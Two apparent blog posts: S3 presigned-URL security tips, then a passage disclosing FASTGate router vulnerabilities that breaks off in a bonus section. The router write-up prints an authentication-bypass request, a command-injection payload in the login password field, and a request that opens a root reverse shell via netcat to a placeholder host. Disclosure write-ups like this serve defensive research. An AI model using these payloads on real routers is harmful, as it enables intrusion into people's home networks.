<h1>Securing your Amazon AWS S3 presigned URLs, tips and tricks</h1>
<p><em>2021-03-06</em></p>
<h1 id="abstract">Abstract</h1>
<p>With the advent of the cloud, <a href="https://aws.amazon.com/s3/">Amazon AWS S3</a>
(Simple Storage Service) has become widely used in most companies to store
objects, files or more generally data in a persistent and easily accessible way.</p>
<p>AWS S3 buckets can be (and in fact, are) integrated into almost any modern
infrastructure: from mobile applications where the S3 bucket can be queried
directly, to web applications where it can be proxied behind a back end,
to micro-services that use them to store processed documents, logs, or other
data for both short-term and long-term storage.</p>
<p>If you use S3 in your infrastructure, you will probably find yourself in the
situation where you want to return a file from an S3 bucket to the user, or
where you need your user to safely upload a file into the S3 bucket. To make
this integration easier and safer, S3 provides the so-called
<a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/ShareObjectPreSignedURL.html">presigned URLs</a>.</p>
<p>This blog post will briefly explain what a presigned URL is and will summarize
the security considerations and tips I ended up writing after a lot of time
spent playing with them and threat modeling user file upload features.</p>
<p>You will not find ready-to-copy-paste policy configurations for your S3 bucket
or detailed explanations on how to secure your bucket; what you will find
here is a list of good-to-know and good-to-remember considerations that you
should keep in mind if your goal is to use presigned URLs to store objects in
an S3 bucket in a safe(r) way.</p>
<h4 id="disclaimer">Disclaimer</h4>
<p>This is the result of my experience with S3 buckets, not an absolute truth.
If you notice any error or inaccuracy, <a href="mailto:santoru@pm.me">report it to me</a>:
I’ll learn something new and I can make the article more accurate.</p>
<h2 id="presigned-urls-what-are-these-and-some-use-cases">Presigned URLs: What are these and some use cases</h2>
<p>Before starting with the list of tips, let’s briefly discuss what the general
use case for presigned URLs is in a generic modern environment.</p>
<p>Let’s say you host some files on an S3 bucket and you need to expose them to
a user, but you don’t want to set the bucket up as open. Let’s also say you want
to keep some control over access to these files, for example by limiting the
time frame in which the files can be accessed by the user.</p>
<p>Now let’s say you create a feature that involves the user uploading a document
and that you want to store this file in an S3 bucket.
How do you handle this in a secure way?</p>
<p>Here’s where presigned URLs come in handy: AWS S3 provides an easy way to share
S3 objects by creating links to access them, signed with the owner’s credentials.
<a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/ShareObjectPreSignedURL.html">Amazon’s documentation</a>
explains this concept clearly:</p>
<blockquote>
<p>All objects by default are <strong>private</strong>. Only the object owner has permission
to access these objects. However, the object owner can <strong>optionally share</strong>
objects with others by creating a presigned URL, using their own security
credentials, to grant <strong>time-limited permission</strong> to download the objects.</p>
</blockquote>
<p>So here’s the deal: unless you configure your bucket differently (for example
to be read-accessible to everybody) your files are private, but they can be shared by
creating a time-limited permission in the form of a link. Neat!</p>
<p>But what does a presigned URL look like? Let’s go with an example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://yourbucket.s3.eu-west-1.amazonaws.com/yourfile.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=some-aws-credential-to-identify-the-signer&X-Amz-Date=timestamp-of-generation&X-Amz-Expires=validity-from-generation-timestamp&X-Amz-Signature=4709da5a980e6abc4ab7284c1b6aa9e624f388e08f6a7609e28e5041a43e5dad&X-Amz-SignedHeaders=host
</code></pre></div></div>
<p>or in a more user-friendly format:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://yourbucket.s3.eu-west-1.amazonaws.com/pdf/yourfile.pdf ?
X-Amz-Algorithm = AWS4-HMAC-SHA256 &
X-Amz-Credential = some-aws-credential-to-identify-the-signer &
X-Amz-Date = timestamp-of-generation &
X-Amz-Expires = validity-from-generation-timestamp &
X-Amz-Signature = 4709da5a980e6abc4ab7284c1b6aa9e624f388e08f6a7609e28e5041a43e5dad &
X-Amz-SignedHeaders = host
</code></pre></div></div>
<p>Most of these parameters are configured or generated by the AWS SDK,
but how to create a presigned URL is not the goal of this
article. What is important to remember is that S3 will try to compute the
same signature for the specified credentials, including the optional
<code class="language-plaintext highlighter-rouge">SignedHeaders</code> parameter in its calculation, and will check that the signature is valid
and that the link has not expired yet.</p>
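<p>To make the mechanics concrete, here is a simplified, self-contained sketch of the SigV4 query-string signing that the SDK performs for a presigned GET URL. This is an illustration, not a replacement for the SDK: it omits details such as session tokens and some percent-encoding edge cases, and all names and credentials below are placeholders.</p>

```python
# A simplified illustration of SigV4 query-string signing for a presigned
# GET URL. All names and credentials are placeholders; use the AWS SDK in
# real code -- this omits session tokens and some encoding edge cases.
import hashlib
import hmac
from urllib.parse import quote

def _hmac(key: bytes, msg: str) -> bytes:
    return hmac.new(key, msg.encode(), hashlib.sha256).digest()

def presign_get(bucket, key, access_key, secret_key, region, amz_date, expires):
    host = f"{bucket}.s3.{region}.amazonaws.com"
    datestamp = amz_date[:8]                       # e.g. "20210306"
    scope = f"{datestamp}/{region}/s3/aws4_request"
    params = {
        "X-Amz-Algorithm": "AWS4-HMAC-SHA256",
        "X-Amz-Credential": f"{access_key}/{scope}",
        "X-Amz-Date": amz_date,
        "X-Amz-Expires": str(expires),
        "X-Amz-SignedHeaders": "host",
    }
    query = "&".join(f"{quote(k, safe='')}={quote(v, safe='')}"
                     for k, v in sorted(params.items()))
    # Canonical request: method, path, query, canonical headers,
    # signed header names, payload hash (unsigned for presigned URLs)
    canonical = "\n".join(["GET", f"/{key}", query,
                           f"host:{host}\n", "host", "UNSIGNED-PAYLOAD"])
    string_to_sign = "\n".join(["AWS4-HMAC-SHA256", amz_date, scope,
                                hashlib.sha256(canonical.encode()).hexdigest()])
    # Derive the signing key through the HMAC chain, then sign
    signing_key = _hmac(_hmac(_hmac(_hmac(
        b"AWS4" + secret_key.encode(), datestamp), region), "s3"), "aws4_request")
    signature = hmac.new(signing_key, string_to_sign.encode(),
                         hashlib.sha256).hexdigest()
    return f"https://{host}/{key}?{query}&X-Amz-Signature={signature}"

url = presign_get("yourbucket", "yourfile.pdf", "AKIAEXAMPLE",
                  "not-a-real-secret", "eu-west-1", "20210306T172024Z", 3600)
```

If any signed part of the request changes (the key, an expired date, a tampered parameter), S3's recomputed signature no longer matches and the request is rejected.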
<p>Something else that is important to remember is that when you create a presigned
URL for an object (for both scenarios where you want to upload or download a file)
you <strong>must provide to the SDK valid credentials</strong> to generate a valid
signature. This means that the presigned URL will be authenticated to access the
resource “on behalf of” the credentials you used to generate it.</p>
<p>That said, the ideal setup would usually be a dedicated back end service
with dedicated (and restricted) credentials that generates presigned URLs for
specific resources and returns them to the front end or to the client,
where they can be directly used to <strong>read</strong> or <strong>write</strong> the “signed” resource (Fig. 1).</p>
<figure class="image">
<img class="full-width" src="/img/s3/upload_scenario.png" alt="Figure 1 - A very simplified schema that shows how presigned URLs are used" />
<figcaption>
Figure 1 - A very simplified schema that shows how presigned URLs are used
</figcaption>
</figure>
<p>Now let’s move on to the recommendations, which are not sorted in any specific order.</p>
<h2 id="1-presigned-urls-can-be-reused">1. Presigned URLs can be reused</h2>
<p>Yes, these URLs are not one-shot, and the only thing that temporally limits
a presigned URL is the <code class="language-plaintext highlighter-rouge">X-Amz-Expires</code> parameter: once the presigned URL is
generated, it can be used an unlimited number of times before it expires.
This means that if you grant read access to an object in a bucket for 1 day,
anyone with the link can access that object for the whole day, multiple times.
This also means that if you grant write access via a presigned URL to a bucket
for 1 day, anyone with the URL could upload whatever file they want, any time
they want.</p>
<h2 id="2-anyone-can-use-a-valid-presigned-url">2. Anyone can use a valid presigned URL</h2>
<p>Just to make sure this is clear: if you generate a presigned URL, anyone can use
it. The user generating the link could use it to <em>phish</em> another user
and let them upload an arbitrary file.
So be sure you properly threat model your feature to avoid logic
vulnerabilities. If your service is generating a presigned URL valid for 10
minutes to upload a file, that URL can be used by anyone, unless you
validate the request in a different way. A solution could be adding an
additional signed header while building the presigned URL, in a way that
only allowed clients can perform the request (check point #8).</p>
<h2 id="3-presigned-urls-do-not-provide-authentication">3. Presigned URLs do not provide authentication</h2>
<p>When your service returns a presigned URL to a user, the user will consume it
to read / upload an object directly from / into the S3 bucket. This means
that your service will not handle that file directly before it’s uploaded.
This also means that your authentication layer will not usually be in place,
unless your S3 bucket has some authentication proxy in front of it.
In other words, presigned URLs only provide authorization to access a specific
object in a bucket (and possibly impose some restrictions on that access),
but the authentication is implicitly connected to the IAM role that
generates the presigned link. In your ideal setup this means that, while
checking the signature, S3 will match the presigned URL to the service
whose credentials generated it, not to the client.
If you want to provide authentication for the actual user consuming the link,
you need to implement this yourself while generating the presigned link,
for example by storing the presigned link along with the identifier of the user
that requested it.</p>
<p>For file uploads, another solution could be to generate a random UUID as the
filename for the object to be uploaded and store this UUID with the user
identifier in your database; alternatively, you can append the user identifier
directly to the random UUID in the filename.</p>
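<p>As a sketch of this idea, the object key can be generated entirely server-side; the <code class="language-plaintext highlighter-rouge">uploads/</code> prefix and the key layout below are just illustrative choices, not a prescribed scheme:</p>

```python
# Sketch: tie an upload to the requesting user by generating the object key
# server-side instead of trusting a client-supplied filename.
import uuid

def make_object_key(user_id: str) -> str:
    # The random UUID discards any user-controlled filename entirely;
    # embedding the user id lets you attribute the object later.
    return f"uploads/{user_id}/{uuid.uuid4()}"

key = make_object_key("user-1234")
```

The key is then what you pass to the SDK when generating the presigned URL, and what you store alongside the user record.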
<h2 id="4-do-not-give-full-access-to-the-bucket-to-the-service-creating-presigned-urls">4. Do not give full access to the bucket to the service creating presigned URLs</h2>
<p>If the only task of your back end service is to upload files into a bucket,
you probably don’t need to configure an IAM role that is capable of reading
all the objects in the bucket or deleting them, and you probably don’t
want that to be possible either, so keep in mind to stick to the principle of least
privilege and only grant the necessary permissions when configuring the
IAM role.</p>
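<p>As an illustration of such a least-privilege setup, an IAM policy for an upload-only service could look roughly like the following; the bucket name and prefix are placeholders, and you should adapt the actions to your actual needs:</p>

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowUploadOnlyToUploadsPrefix",
      "Effect": "Allow",
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::yourbucket/uploads/*"
    }
  ]
}
```

Notably absent are <code class="language-plaintext highlighter-rouge">s3:GetObject</code>, <code class="language-plaintext highlighter-rouge">s3:DeleteObject</code>, and any wildcard over the whole bucket.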
<p>Having your back-end service handle credentials that can do more than you want
is a big risk for your infrastructure security and your users: let’s say you
configure your service to use the bucket owner’s credentials; what happens if the
keys get leaked or if a malicious actor can access them? You guessed it:
they get full access to the bucket and its content. Now let’s say your
service is configured with an IAM role that can only read files under a specific
folder. You see the improvement? The attacker can still read uploaded
files, and this is still bad, but definitely better than having the attacker
delete all the files, or replace some with malicious ones.</p>
<p>Keep in mind also that credentials or keys shouldn’t be hard coded:
there are several alternatives for safely storing secrets and retrieving them
when needed, and AWS itself has a specific service to do that, called
<a href="https://aws.amazon.com/secrets-manager/">AWS Secrets Manager</a>, so don’t
hard-code credentials and secrets.</p>
<h2 id="5-enable-server-access-logging-on-your-exposed-s3-bucket">5. Enable server access logging on your exposed S3 bucket</h2>
<p>This is a generic recommendation that applies even if you don’t use presigned
URLs and should be followed for any S3 bucket. The reasoning is clearly
explained on the <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerLogs.html">Server Logs</a>
page from AWS:</p>
<blockquote>
<p>Server access logging provides detailed records for the requests that are
made to a bucket. Server access logs are useful for many applications.
For example, access log information can be useful in security and access
audits. It can also help you learn about your customer base and understand
your Amazon S3 bill.</p>
</blockquote>
<p>This is not enabled by default, as mentioned on the
<a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-server-access-logging.html">relevant web page</a>:</p>
<blockquote>
<p>By default, Amazon S3 doesn’t collect server access logs.</p>
</blockquote>
<h2 id="6-path-traversal-can-be-a-thing-sanitize-that-filename">6. Path traversal can be a thing, sanitize that filename</h2>
<p>Or even better, use a random UUID.
Depending on your application’s design, if the user can control the filename of
the file being uploaded, you could be exposed to some threats like path
traversal attacks, as shown
<a href="https://hackerone.com/reports/94087">here</a> or
<a href="https://hackerone.com/reports/254200">here</a>. To avoid this, you should sanitize
that filename before using it to generate the presigned URL. Another good
solution would be to generate a random UUID and use that as a filename,
completely discarding the user controlled input.</p>
<h2 id="7-be-careful-with-file-size-theres-no-built-in-functionality-to-limit-it">7. Be careful with file-size, there’s no built in functionality to limit it</h2>
<p>With presigned URLs,
<a href="https://github.com/aws/aws-sdk-net/issues/424">you don’t have an easy way to limit file size</a>,
and this can be a problem. S3 has a cap of 5GB per request, so you shouldn’t
end up with a huge file on your disk, but depending on your file processing
algorithm and your expectations on file size, 5GB could be a bit more
than you expect.</p>
<p>Presigned URLs do not allow you to configure a max file size with an easy-to-set
parameter, but there are some workarounds, as you can see from #8 or #9.</p>
<p>Depending on your infrastructure design, this might not even be a problem (but
it’s still good to keep in mind).</p>
<h2 id="8-using-signed-headers-you-can-add-a-files-hash-and-avoid-uncontrolled-file-uploads">8. Using signed headers, you can add a file’s hash and avoid uncontrolled file uploads</h2>
<p>As said before, once a presigned URL is generated, you don’t have control over
who can upload a file, but you can mitigate this by generating a presigned URL
that checks the file’s MD5 hash. How? By using <code class="language-plaintext highlighter-rouge">X-Amz-SignedHeaders</code>.</p>
<p>By specifying the <code class="language-plaintext highlighter-rouge">Content-MD5</code> header while generating the presigned URL, your
service can enforce that the presigned URL is valid only if the value received
for this header while the user uploads the file matches the one specified at
generation time. This way you generate a presigned URL for a
specific file, not for a generic one (Fig. 2).</p>
<figure class="image">
<img class="full-width" src="/img/s3/upload_md5.png" alt="Figure 2 - Presigned URL generation by enforcing the md5 hash" />
<figcaption>
Figure 2 - Presigned URL generation by enforcing the md5 hash
</figcaption>
</figure>
<p>Keep in mind that this will not protect against a customer who wants to upload
an arbitrary file, as the customer will be able to compute the hash and
request a presigned link for that file, but it will protect against scenarios
where the user wants to take a presigned link and let someone else upload
an arbitrary file (for example in a phishing scenario).</p>
<p>You can also use <code class="language-plaintext highlighter-rouge">SignedHeaders</code> to enforce additional controls, for example on
file size by signing the <code class="language-plaintext highlighter-rouge">content-length</code> header.</p>
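<p>As a small sketch of the agreement involved: the <code class="language-plaintext highlighter-rouge">Content-MD5</code> value is the base64 encoding of the raw MD5 digest (per RFC 1864), and both the service generating the URL and the client uploading the file must compute it the same way:</p>

```python
# Sketch: compute the Content-MD5 header value (base64 of the raw MD5
# digest, per RFC 1864). The service signs the URL against this value;
# the client must send the same value when uploading.
import base64
import hashlib

def content_md5(data: bytes) -> str:
    return base64.b64encode(hashlib.md5(data).digest()).decode()

md5_header = content_md5(b"hello world")
```

If the bytes actually uploaded produce a different digest, the signature check fails and S3 rejects the upload.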
<h2 id="9-you-could-use-post-rather-than-put">9. You could use POST rather than PUT</h2>
<p>Amazon’s AWS S3 documentation
<a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/PresignedUrlUploadObject.html">mentions that</a>:</p>
<blockquote>
<p>When you create a presigned URL, you must provide your security
credentials and then specify a bucket name, an object key,
an HTTP method (<strong>PUT for uploading objects</strong>), and an expiration date and time.</p>
</blockquote>
<p>This is the default situation, but with the PUT method you don’t have some controls
that you could get with POST. Why? Because of
<a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-HTTPPOSTConstructPolicy.html">POST Policies</a>.</p>
<p>A POST policy is a sequence of rules (called conditions) that must be met when
performing a POST request to an S3 bucket in order for the request to succeed.
You can configure these directly from the AWS console.</p>
<p>One benefit, among others, of using a POST policy is that the
<a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-HTTPPOSTConstructPolicy.html#sigv4-PolicyConditions">list of conditions</a>
contains <code class="language-plaintext highlighter-rouge">content-length-range</code>, which can easily address
consideration #7.</p>
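<p>As a rough sketch of what such a policy document looks like before it is base64-encoded and signed; the bucket, prefix, and expiration are placeholder values, and in practice the SDK (for example via a helper like boto3’s <code class="language-plaintext highlighter-rouge">generate_presigned_post</code>) builds and signs this for you:</p>

```python
# Sketch of a POST policy document enforcing a size limit via
# content-length-range. Bucket name, key prefix, and expiration
# below are illustrative placeholders.
import base64
import json

policy = {
    "expiration": "2021-03-07T12:00:00Z",
    "conditions": [
        {"bucket": "yourbucket"},
        ["starts-with", "$key", "uploads/"],
        # Reject uploads outside 1 byte .. 5 MiB
        ["content-length-range", 1, 5 * 1024 * 1024],
    ],
}
# The base64-encoded policy is what gets signed and included in the POST form
encoded = base64.b64encode(json.dumps(policy).encode()).decode()
```

S3 evaluates every condition against the actual multipart form upload, so an upload larger than the range is refused before it lands in the bucket.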
<p>But can I still use PUT?</p>
<p>It is still not clear to me what the best solution between POST and PUT is; I
have seen both used in production and I think it depends a lot on the specific use
case: presigned URLs use PUT by default and you don’t need to write a policy,
but you lose flexibility. On the other hand, POST gives you more control but
is, in my opinion, less straightforward to implement.
Amazon seems to suggest using POST policies,
<a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-post-example.html">considering this article where they show an example of browser-based upload</a>.</p>
<h2 id="10-keep-the-expiration-of-the-presigned-url-low-especially-for-file-write">10. Keep the expiration of the presigned URL low, especially for file write</h2>
<p>This is self-explanatory: keep the presigned URL as short-lived as you can.
Most of the time, presigned URLs are used to download a single file from a
bucket and are then discarded. In most scenarios, your front end does not even
keep track of the link itself and, once the file is downloaded, the link is discarded.</p>
<p>For file uploads the situation is similar: if your front end is taking care of
requesting the presigned link and uploading the file, this shouldn’t take
long. If it takes longer than expected, the presigned link can be requested
again. There’s no need to keep an upload link valid for hours.</p>
<h2 id="11-dont-forget-to-configure-cors">11. Don’t forget to configure CORS</h2>
<p>If your front end is a web application served in a browser, you must configure
CORS (Cross-Origin Resource Sharing), otherwise your client’s requests will fail
due to the browser’s protections. CORS is intended to protect your customers from
malicious websites that could perform actions on their behalf.</p>
<p>Even if your policies and permissions still apply when you configure
CORS, blocking unauthorized websites from performing cross-origin requests to your
bucket is a must.</p>
<p>Via the CORS configuration panel you can configure your allowed domains in the
<code class="language-plaintext highlighter-rouge">AllowedOrigin</code> object. Keep the principle of least privilege in mind also when
configuring CORS: only white-list websites that you have control over.</p>
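<p>For illustration, a minimal CORS configuration (in the JSON format used by the S3 console) that only allows a single controlled origin could look like this; the origin and methods below are placeholders to adapt to your setup:</p>

```json
[
  {
    "AllowedOrigins": ["https://app.example.com"],
    "AllowedMethods": ["GET", "PUT"],
    "AllowedHeaders": ["*"],
    "MaxAgeSeconds": 3000
  }
]
```

Any browser request from an origin not listed in <code class="language-plaintext highlighter-rouge">AllowedOrigins</code> will fail its CORS check.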
<p>If you want to know more about CORS and how to apply it, Amazon provides
<a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/cors.html">great documentation</a>
on the topic with lots of examples, and I suggest you read it.</p>
<p>If your front end is a mobile application, then CORS won’t apply: CORS is
enforced by browsers to prevent unwanted cross-origin requests, and mobile applications are not
considered a web origin (and are not susceptible to attacks that leverage
cross-origin requests). In this case you still want to ensure that websites
can’t access your bucket, and you can do this by ensuring that your CORS
configuration has no allowed origin or is disabled. If CORS is disabled,
browsers will not perform any request.</p>
<h1 id="conclusion">Conclusion</h1>
<p>With this blog post I hope I gave you an idea of what to keep in mind
while designing a user upload feature with presigned URLs. As you can see,
depending on your threat model, the things to keep in mind can be different.</p>
<p>I’m sure there are other valid recommendations that you can suggest, as I don’t
think I covered 100% of the topic.</p>
<p>File uploads can be very dangerous functionality and the risks involved are
multiple. Even if you follow these recommendations, you don’t know whether the file
being uploaded by a user is malicious or not, and processing it could have
unwanted results. That’s why it is suggested to process untrusted files in a
restricted environment.</p>
<p>Finally, AWS provides a lot of documentation on S3 and how to secure it further;
I suggest you read
<a href="https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/">this document</a>
if you’d like to know more about how to secure files in S3 buckets.</p>
<p>If you enjoyed this post, you can
<a href="https://twitter.com/santoru_">follow me on Twitter</a>
or
<a href="https://github.com/santoru">check out my GitHub profile</a></p>
<h1 id="references">References</h1>
<ul>
<li><a href="https://aws.amazon.com/s3/" target="_blank">Amazon AWS S3</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/ShareObjectPreSignedURL.html" target="_blank">AWS Docs | Sharing an object with a presigned URL</a></li>
<li><a href="https://aws.amazon.com/secrets-manager/" target="_blank">Amazon AWS Secret Manager</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerLogs.html" target="_blank">AWS Docs | Logging requests using server access logging</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-server-access-logging.html" target="_blank">AWS Docs | Enabling Amazon S3 server access logging</a></li>
<li><a href="https://hackerone.com/reports/94087" target="_blank">Arbitrary read on s3://shopify-delivery-app-storage/files</a></li>
<li><a href="https://hackerone.com/reports/254200" target="_blank">Escaping images directory in S3 bucket when saving new avatar, using Path Traversal in filename</a></li>
<li><a href="https://github.com/aws/aws-sdk-net/issues/424" target="_blank">Limit an upload filesize with a Pre-signed URL</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/PresignedUrlUploadObject.html" target="_blank">AWS Docs | Uploading objects using presigned URLs</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-HTTPPOSTConstructPolicy.html" target="_blank">AWS Docs | Creating a POST Policy</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-HTTPPOSTConstructPolicy.html#sigv4-PolicyConditions" target="_blank">AWS Docs | Creating a POST Policy - Conditions</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-post-example.html" target="_blank">AWS Docs | Example: Browser-Based Upload using HTTP POST (Using AWS Signature Version 4)</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/cors.html" target="_blank">AWS Docs | Using cross-origin resource sharing (CORS)</a></li>
<li><a href="https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/" target="_blank">How can I secure the files in my Amazon S3 bucket?</a></li>
<li><a href="https://twitter.com/santoru_" target="_blank">santoru_ | Twitter</a></li>
<li><a href="https://github.com/santoru" target="_blank">santoru | GitHub</a></li>
</ul>

<h1>Hacking into a FASTGate router with a command injection (and a bunch of other vulnerabilities)</h1>
<p><em>2018-10-13</em></p>
<p>This blog post describes how I found a couple of vulnerabilities in the FASTGate modem/router provided by Fastweb, an Italian telecommunications company, to its clients. Thanks to these vulnerabilities I was able to bypass the authentication layer, execute arbitrary code via command injection, and get a reverse shell on the router.
All vulnerabilities have been disclosed to Fastweb and are fixed in newer versions of the firmware.</p>
<h2 id="fastgate-the-latest-generation-modem-from-fastweb">FASTGate: the latest generation modem from Fastweb</h2>
<p>Fastweb<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup> is an Italian telecommunications company that provides internet services. Around March 2017 the company started to ship a new modem to its clients: the FASTGate<sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>.
Working as a penetration tester, and having the possibility to test it out, I started to analyze its web interface in order to find some vulnerabilities that could give me some unintended access to it. Goal of the night: popping a shell!<br />
The first step was to set up Burp Suite as a proxy and navigate a bit through the web pages to save some requests and responses.
The first screen I got was the login panel, as shown in figure 1.</p>
<figure class="image">
<img class="full-width" src="/img/fastgate/login.png" alt="Figure 1 - Login panel" />
<figcaption>
Figure 1 - Login panel
</figcaption>
</figure>
<h3 id="broken-authentication-layer">Broken authentication layer</h3>
<p>I logged in and started to browse some pages and execute actions in order to understand how requests were handled. The first thing I noticed was that the login request did not return any cookie nor any token to the client and this made me suspicious: did they implement some authentication at all? <br />
They didn’t.</p>
<p>What I noticed was that the web application was simply sending AJAX requests to a CGI binary, called <code class="language-plaintext highlighter-rouge">status.cgi</code>, using a parameter called <code class="language-plaintext highlighter-rouge">nvget</code> to specify the action.
For example, the following GET request was enough to list all devices ever connected to the router, with their assigned IP, their MAC address and their hostname:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET http://192.168.1.254/status.cgi?nvget=pc_list
</code></pre></div></div>
<p>Just to have a nice output to show, I developed a Python script that parses the JSON response and displays it:</p>
<figure class="image">
<img class="full-width" src="/img/fastgate/userenum.png" alt="Figure 2 - Devices enumeration" />
<figcaption>
Figure 2 - Devices enumeration
</figcaption>
</figure>
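<p>A minimal sketch of such a parser is shown below; note that the exact JSON schema returned by <code class="language-plaintext highlighter-rouge">status.cgi</code> is an assumption here, so the field names are illustrative rather than the router’s actual ones:</p>

```python
# Sketch of a parser for the status.cgi device list. The JSON field
# names ("pc_list", "hostname", "ip", "mac") are assumed, not taken
# from the actual router firmware.
import json

def parse_pc_list(body: str):
    data = json.loads(body)
    return [(d.get("hostname", "?"), d.get("ip", "?"), d.get("mac", "?"))
            for d in data.get("pc_list", [])]

# In practice `sample` would be the body of
# GET http://192.168.1.254/status.cgi?nvget=pc_list
sample = ('{"pc_list": [{"hostname": "laptop", '
          '"ip": "192.168.1.10", "mac": "aa:bb:cc:dd:ee:ff"}]}')
for host, ip, mac in parse_pc_list(sample):
    print(f"{host:15} {ip:15} {mac}")
```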
<h3 id="unauthenticated-command-injection-in-login-page">Unauthenticated command injection in login page</h3>
<p>With this trivial <em>authentication bypass</em> via the <code class="language-plaintext highlighter-rouge">status.cgi</code> binary, I went back to the login request and started to manually fuzz both the username and password fields. After a few tests I noticed that the server’s response, after I put a single quotation mark into the password field, printed an interesting line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HTTP/1.0 200 OK
sh: syntax error: unterminated quoted string
Content-type: text/html
</code></pre></div></div>
<p>Uhm.. what? Am I dreaming? Is my controlled input really used to execute a shell command with no sanitization at all?
I wanted to see if I could actually run some commands, so I tried executing <code class="language-plaintext highlighter-rouge">ping</code>, which is usually installed on any distribution:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET /status.cgi?_=1512070412178&cmd=3&nvget=login_confirm&password='$(ping)'&remember_me=1&username=admin HTTP/1.1
</code></pre></div></div>
<p>The response was the confirmation I was looking for:</p>
<figure class="image">
<img class="full-width" src="/img/fastgate/ping.png" alt="Figure 3 - Ping command" />
<figcaption>
Figure 3 - Ping command
</figcaption>
</figure>
<p>As shown, I can successfully send arbitrary commands by adding the text <code class="language-plaintext highlighter-rouge">'$(`command`)'</code> to the password input.
The impact of this vulnerability is full code execution on the router, but it’s not clear what privileges I’m running with; having a shell to quickly interact with the router would be ideal!</p>
<h4 id="getting-the-reverse-shell">Getting the reverse shell</h4>
<p>The command execution is cool, but can we go further? Can we get a real shell into the system? Of course we can! After some enumeration done via the command injection, I noticed that the router shipped several <code class="language-plaintext highlighter-rouge">netcat</code> binaries, one of which was luckily compiled with support for the <code class="language-plaintext highlighter-rouge">-e</code> parameter that, quoting the man page, will <code class="language-plaintext highlighter-rouge">execute external program after accepting a connection or making connection</code>.
Let’s use this <code class="language-plaintext highlighter-rouge">nc</code> binary to run a reverse shell:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET /status.cgi?cmd=3&nvget=login_confirm&password=AA'$(`/statusapi/usr/bin/nc%20LHOST%20LPORT%20-e%20/bin/bash`)AAremember_me=1&username=admin HTTP/1.1
</code></pre></div></div>
<p>This was enough to get a full reverse shell into the system, and guess what? The process is running as <code class="language-plaintext highlighter-rouge">root</code>, so we get full access to the device.</p>
<figure class="image">
<img class="full-width" src="/img/fastgate/poc.png" alt="Figure 4 - Exploit executed to get a shell" />
<figcaption>
Figure 4 - Exploit executed to get a shell
</figcaption>
</figure>
<h2 id="conclusions">Conclusions</h2>
<p>For documentation purposes, the vulnerable software version that I tested is <code class="language-plaintext highlighter-rouge">v1.0.1b</code>, with firmware version <code class="language-plaintext highlighter-rouge">0.00.47_FW_200_Askey2017-05-17 17:31:59</code>.<br />
It must be noted that in order to exploit the vulnerability the attacker must be authenticated to the Wi-Fi network, as the admin interface is exposed on the internal network.</p>
<figure class="image">
<img class="full-width" src="/img/fastgate/version.png" alt="Figure 5 - Vulnerable version" />
<figcaption>
Figure 5 - Vulnerable version
</figcaption>
</figure>
<p>The communication with Fastweb didn’t go very smoothly. I tried to contact them multiple times to report these vulnerabilities, but after an initial ack they stopped any communication with me.
A few weeks after my emails, they released a new firmware version that addressed most of the vulnerabilities:</p>
<ul>
<li>The login request now returns a session token that is used to authenticate all requests to <code class="language-plaintext highlighter-rouge">status.cgi</code>, so it seems that they fixed the trivial “bypass”.</li>
<li>They initially added a CSRF protection by setting a cookie called <code class="language-plaintext highlighter-rouge">XSRF-TOKEN</code>: when sending a request, the web application sends both the cookie and an <code class="language-plaintext highlighter-rouge">X-XSRF-TOKEN</code> header with the same value. There’s no actual validation of the token value, though: no matter what value the user decides to send, as long as the cookie matches the header, the server will accept the request.</li>
<li>The command injection was still present in a bunch of updates, but was eventually fixed.</li>
</ul>
<p>At the time, they didn’t have any responsible disclosure program nor any specific security contact, but they did create one shortly after my first email. The Responsible Disclosure<sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup> webpage they created has a Hall of Fame, but I was not mentioned there.</p>
<h2 id="bonus-mini_httpd-v127--thttpd-v227-buffer-overflow">Bonus: mini_httpd v1.27 / thttpd v2.27 buffer overflow</h2>
<p>One of the first things I noticed reading the response from the router was the <code class="language-plaintext highlighter-rouge">Server</code> header: <code class="language-plaintext highlighter-rouge">mini_httpd/1.27 07Mar2017</code>.<br />
According to the developer’s website of <code class="language-plaintext highlighter-rouge">mini_httpd</code><sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">4</a></sup>, it seemed to be the latest available version at the time, and I couldn’t find any public information about known vulnerabilities affecting it.</p>
